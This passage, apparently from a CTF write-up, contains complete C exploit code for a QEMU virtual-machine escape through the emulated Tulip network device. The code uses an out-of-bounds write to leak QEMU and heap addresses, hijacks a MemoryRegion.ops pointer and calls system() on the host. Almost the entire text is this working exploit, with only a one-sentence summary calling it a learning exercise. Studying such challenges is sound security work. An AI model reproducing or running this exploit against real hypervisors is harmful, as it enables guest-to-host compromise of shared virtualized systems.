oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); /* install tx_desc (overwrites the TULIPState fields) */

sleep(1);
printf("[*] hijack ops\n");
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa); /* overwrite ops.write */

pmio_writel(CSR(4), tx_desc_gpa); /* trigger ops.write */
}

The full exploit is as follows:

#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#include <unistd.h>
#include <sys/io.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) // 4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

#define PMIO_BASE 0x000000000000c000
#define CSR(_x) ((_x) << 3)
#define CSR5_TS_SUSPENDED 6

#if 0

tulip_write ->
tulip_xmit_list_update ->
tulip_copy_tx_buffers ->
pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); ->

static uint32_t tulip_ts(TULIPState *s)
{
return (s->csr[5] >> CSR5_TS_SHIFT) & CSR5_TS_MASK;
}

#endif

struct tulip_descriptor {
uint32_t status;
uint32_t control;
uint32_t buf_addr1;
uint32_t buf_addr2;
};

int fd;

uint32_t page_offset(uint32_t addr) {
return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr) {
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}

uint64_t gva_to_gpa(void *addr) {
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

uint64_t pmio_read(uint64_t port) {
uint64_t val;
val = inw(PMIO_BASE + port);
return val;
}

void pmio_write(uint64_t port, uint64_t val) {
outw(val, PMIO_BASE + port);
}

void pmio_writel(uint64_t port, uint64_t val) {
outl(val, PMIO_BASE + port);
}

int main(int argc, char **argv) {
printf("[*] enter stage1\n");
int ret = 0;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
iopl(3);

// allocate descriptor
struct tulip_descriptor *tx_desc = malloc(sizeof(struct tulip_descriptor));
struct tulip_descriptor *rx_desc = malloc(sizeof(struct tulip_descriptor));

char *recv_buf = malloc(0x9000);
char *buf = malloc(0x1000);
memset(buf, 'A', 0x1000);
memset(recv_buf, 'B', 0x9000);

int len1 = 0x400 << 0;
int len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS, clean tx_frame_len
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

// get the physical address of the descriptor
uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// set CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x400 now

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x800 now

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1u << 1)); // CSR6_OM_SHIFT trigger tulip_receive

sleep(1);
printf("[*] OOB write tx_frame_len...\n");

int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa);

struct oob_data { // control the following fields in TULIPState
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = 0x800 - len1;
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);

printf("[*] enter stage2\n"); {
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x3350 - 0x70;
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // catflag
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}

// now control MemoryRegion.ops
printf("[*] enter stage3\n"); {
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;

((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;

((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;

((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;

((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;

((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x2a28-0x70; // now points to the MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
printf("[*] hijack ops\n");
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);

// trigger the ops.write
pmio_writel(CSR(4), tx_desc_gpa);
}

return 0;
}

Summary:

I have only just gotten started with QEMU escapes, so this post mostly walks through understanding and debugging someone else's exploit (the challenge does not strip the debug symbols, which makes debugging fairly painless).